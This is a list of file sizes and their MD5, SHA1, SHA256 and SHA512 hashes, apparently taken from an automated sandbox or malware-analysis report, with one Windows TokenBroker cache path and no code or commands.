SHA512c772ad75fcc712c1fe94036bea3b008df82146beffced713bc4648ddf8318cf1cda3faadd6ee01ecde70ca1b950f5afeb5851eae404d738fc472b4318ffaeae7
-
Filesize
107KB
MD52b66d93c82a06797cdfd9df96a09e74a
SHA15f7eb526ee8a0c519b5d86c845fea8afd15b0c28
SHA256d4c064db769b3c109da2ed80a53fbab00987c17421a47921e41e213781d67954
SHA51295e45c0aea0e704be5f512dffaae377d4abef78da99b3bca769264d69be20f2570daf2f47905645217e1b2696e42b101f26149219f148b4d6dd97a6c2868b6f5
-
Filesize
20KB
MD5e47728c59bfa52b8032179aa07adef78
SHA1cb429cfe29975184a73352ca370fe92b423b9dbe
SHA256b1ec95702d410710989037379b02ef35c3fb354644a8dcc8fd781c8cb3331a93
SHA512f6b60c4f10a4402594392f80970d642da4308e0bd007db159c4f9d189bfbd5a02ead3039ef66be59c1c311ef135d6a742ff0ea1a4ffa6cfc7c54cd5a8275f053
-
Filesize
1KB
MD544f1d2440de82baa65d2d1eb559fbb29
SHA14c22c330b96ee4bd4d7702b82f89f087b83a480a
SHA256f3f0fa970c24b43c5067de2dd2965088f3d62c2369aa131a31dfe1e22d544f11
SHA5124ecc741ebc0088f59b8a43da34a4fecfad1968a9cff98943814bfcc827366366dcfac350fa5107c4e65ece673347adec83a3aa757d9eed8f50a573ff6494ff37
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
14KB
MD5008950d72687527eb574eaeaaa6ba130
SHA1e451a1f352246559ab7049434d06b3db1450ae0e
SHA2566c27903724183fb1c7f11d20c071cd44cefcecd5aecaa19c5df2e6aef628cc7f
SHA51254891431d550a8382c662253df05552a6c117e5da27d76c174e270475f62efddd69147a314a7977a07ad54371c241ad8a207a67390b5ddcca5e1ca0fa1132d5e
-
Filesize
36KB
MD5d5b5f2f329c1cd710d13666a6bd2b7fb
SHA103e434b6615bd795262aca215f5c90b2c8a908f5
SHA2562a1e3dad83e74463bf7c8da50a8eeb5a77548098ad83b1efdca243185d352407
SHA512fa9cb013f84463ad3725799b7206cbfb0798c14e7ecd66502b6327634d93b41c7e563075b4bb40a97d07f6083fa3d3c5a71c40399cffe571b74fd115b1da2e1d
-
Filesize
338B
MD54df258c703bb373d5526395ac03dd765
SHA1eff3d6f066a0262a526314eaf300ec9ce2714af5
SHA25688e036dfc3ea43fa2a05bc8513fa705afd3e0b5a9e80d3b6df0408a8634a80ce
SHA512a975e1924b0d041c206c8faf04e35c702ff33bf7ed624b88a8c20c5f232be3efbcf8162280c348f767c166d498759147dc24e154981bb62dbcef986408e3adc1
-
Filesize
347B
MD574f15270f37c5e66ad2b2b62e7b74454
SHA17d54395e347a436fa581716092a59b2e7a15136d
SHA256cf243ef2e02d1b834f2975753146ee3696ceed3f36cfc7517786cf5b3644cfe6
SHA51286b8cb07e7294ecc60bd158ad2ef6a15f72817baecbf1c427f85dc79f80d22b0ee6eaaa66125323497b28c0601e7a1c334f060bbc4cdce7da054fba3ce624679
-
Filesize
323B
MD5e64a8e2c006eae8275a122fa9122e40b
SHA1062ed02db428eb076b2af0fcf24989e12ce23b35
SHA256c5dce80b78ef19554dc0f5fa55a821863d55e8a15e8374ba8e00b9cc5958d19a
SHA51279401b252a39c35260b6d203a202309536e42b0f63cab21f6f8fc3058ab3b8dbb22d405ee07db5cab76d7474a2cd3d693ed9398b0eedca9dd75568f62129c06b
-
Filesize
4KB
MD59e5affb1cf534ed47ae0f18247cc959c
SHA11fde929724c1d246fb6d539ff0409acd2e01433e
SHA2562b741f5e6cb7663ecd96c4a6d54c2fbb43d96715d62de2fd800003683f90a631
SHA5122a218f631e67547e113587cd15e1e18e138cd810dbd12873671b7025abfc1a17e2b43b6e6e342f6408e88ef482a8e280fa16359ea77063ad14018cab0d2bdcb8
-
Filesize
128KB
MD571456d55cd6e4490df2979649cbcd44e
SHA115098cf69ba5edb92ec5cd3b17f3d0c1af6cd131
SHA256fc03eb13c919b22db0fc116cf9e9f64ee5881e5e477aad42e1aa06b7b0764307
SHA512a3fc4805bc8043b101464b7fc333ddc6b6391c602cdd68117045cdf4e9a550e2aeefb8baf2cb9ec6c31448b64c501943c9ca2490fe376888b77fb2da0d27aa21
-
Filesize
13B
MD53e45022839c8def44fd96e24f29a9f4b
SHA1c798352b5a0860f8edfd5c1589cf6e5842c5c226
SHA25601a3e5d854762d8fdd01b235ce536fde31bf9a6be0596c295e3cea9aaf40f3dd
SHA5122888982860091421f89f3d7444cacccb1938ef70fc084d3028d8a29021e6e1d83eaef62108eace2f0d590ed41ece0e443d8b564e9c9a860fc48d766edb1dc3d9
-
Filesize
12KB
MD59bddcc8f0406bbc7ab49bb6126803204
SHA19d271b9ed742ac289a73b18cef83cfa9e6a1a7d3
SHA256019cce59755f10f91ec0cc288299667b2da4ed1ba9d6704298f60a47901860d6
SHA5126cf5175c634cd621411e1cadf841ff15caf34d482cb6e860bf59a9683e7fc8fb9c0cca0706bfe909564f114f33aa2ce25bd5d86cbacc5c8c6ed6fd6d040f0673
-
Filesize
7KB
MD536febd09cb87f348dd98dc26c9de47f9
SHA1e7ec9080138b5e8649a153ac09da90c2d70c22e2
SHA25601f61a3b3307ad59b270b9b03bbbdd5c0dbc7015ee49dec39676c1cc43de7b4a
SHA512317b0d4ebda1aa60a88fec2b1cfdd79d6dd0ae6320d9dae8396d845ae98f618af80a23576a3d4984900700e5fef4ca63cf541a0d5a65a759b873c9d285302624
-
Filesize
36KB
MD5478462caf79113868a95a8b2d1b0d5fd
SHA115342173ef7715d73a4e2a128124992677c3a301
SHA256b455ce3a80b4717df443f86ece150ce6cdf448741a1413e3c4eabd5ee5bfa208
SHA5122ae1e0c182eb784028f02abedaab22479d7c080e8ed13a62f4b729597fe9336a5ba79a2b595e6864c827f1bd62adfbd428db56d15322289ea1df5e54c33b9780
-
Filesize
86B
MD5961e3604f228b0d10541ebf921500c86
SHA16e00570d9f78d9cfebe67d4da5efe546543949a7
SHA256f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed
SHA512535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472
-
Filesize
6KB
MD5e73e1d3ada8437fc09c7671831d33e5d
SHA16eeb0ef015c7c761e78c421c4e31875117ba8204
SHA2562499e6967c0566967953691cc24b6ee060e4904afcc3d904e73bf4ff8419c1ef
SHA5128e669833d0389a3975464cf7d901d631b923d0b41395d11f3433a02de9c068a22e8b22fc6ffad496e937d6439aec9b6c464e418d3e7436a8f3db02d1ea2be146
-
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
Filesize2KB
MD5b80dafd592a0d02ed25f453754411f6b
SHA1227f07236f82ff6e84ebac100f433886d871a6c3
SHA25665eb10c59c5a7a7fe3669c2cfaed74e094d49718c10007806412bc81b208392b
SHA51274702f64318d32142452222af00cead0378b17a52423a56d1a8a9a60754a801087e5a4776b964324ac27260694238397153e783a524478c37d37d09269dccd93
-
Filesize
1.5MB
MD5ca54187827e3ef0d1b74772e30cc46ea
SHA1a488e92ca039dc49767299ba6a6b78d27126d839
SHA25628382a86a4980b9e60284f4f571f8fe64e2fe649d2d5aa64f2d378f8a162bf9e
SHA5126b2d090b82a425040c3c2733fbcd0d07478a3894c3c8b271586f596d6842fad815a5d40fa46448357633fe0f56adc6c495f4477e9747cbfb2d93219656e2f5d5
-
Filesize
164KB
MD5f036e84b63600df39664d4abbfcabe9a
SHA154edc28ad4d2054e73447f3c4f51ca228da92d76
SHA256e2c2e8828cb743fa822e18be80aa4371b7fee9cae2079f125812d5f04f294c48
SHA512ffc2ab783f8a1cca32beeca2d2bba4ba657777914b2596673471bc11e42cbe54c2edbce84f2556fe031d6c82ab16c56b7303d44ed471d0c3bbefb7683bc5c3e9
-
Filesize
1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
Filesize
907KB
MD529d53eec589f731082b73dadc9050b71
SHA157f85307e98dd2ab83947d552d5e8d5553fa1f0a
SHA256a94393921e9a9280da6c9f354d69b6fd3c64323503465c0c33fe6d030c492c63
SHA512770e8819852a32f395922a38cb093c5452107d93a6b11bd3b3dd37786680d26c2c740a068f25c1b684a7418f35285ea79ac0359daa7108f407c017a5888f9d9f
-
Filesize
9KB
MD5913967b216326e36a08010fb70f9dba3
SHA17b6f8c2eb5b443e03c212b85c2f0edb9c76ad2bf
SHA2568d880758549220154d2ff4ee578f2b49527c5fb76a07d55237b61e30bcc09e3a
SHA512c6fcb98d9fd509e9834fc3fba143bd36d41869cc104fbce5354951f0a6756156e34a30796baaa130dd45de3ed96e039ec14716716f6da4569915c7ef2d2b6c33
-
Filesize
3KB
MD5c6086d02f8ce044f5fa07a98303dc7eb
SHA16116247e9d098b276b476c9f4c434f55d469129c
SHA2568901d9c9aea465da4ea7aa874610a90b8cf0a71eba0e321cf9675fceee0b54a0
SHA5121876d8fc1a8ac83aadb725100ea7a1791bd62d4d0edc1b78802e0bffe458f309a66dc97e1b9da60dd52b8cb80bf471ccb5f8480e6192c9eb2a13eac36462d27a
-
Filesize
3KB
MD539b9eb9d1a56bc1792c844c425bd1dec
SHA1db5a91082fa14eeb6550cbc994d34ebd95341df9
SHA256acade97e8a1d30477d0dc3fdfea70c2c617c369b56115ec708ed8a2cfdbc3692
SHA512255b1c1c456b20e6e3415540ef8af58e723f965d1fa782da44a6bbc81b43d8a31c5681777ba885f91ed2dae480bc2a4023e01fe2986857b13323f0459520eb51
-
Filesize
2KB
MD54ac1741ceb19f5a983079b2c5f344f5d
SHA1f1ebd93fbade2e035cd59e970787b8042cdd0f3b
SHA2567df73f71214cdd2f2d477d6c2c65f6e4c2f5955fc669cde9c583b0ff9553ecdc
SHA512583706069a7c0b22926fa22fc7bedcca9d6750d1542a1125b688fbb0595baf6cefc76e7b6e49c1415c782a21d0dd504c78fa36efad5f29f2fd5d69cc45ad8dcd
-
Filesize
2KB
MD5a9124c4c97cba8a07a8204fac1696c8e
SHA11f27d80280e03762c7b16781608786f5a98ff434
SHA2568ad3d28aeff847bc5fb8035cbc7c71e88a4ee547821a8e1a3ea6661ee6014b21
SHA512537caaa75ac1e257c6b247f9680c3b9e79156ea1bcb3f1326e969a774db33b3c906800813ca6f79369c799a62f4260c91c6dd9a6cace3af25b7dbea5a73e0392
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82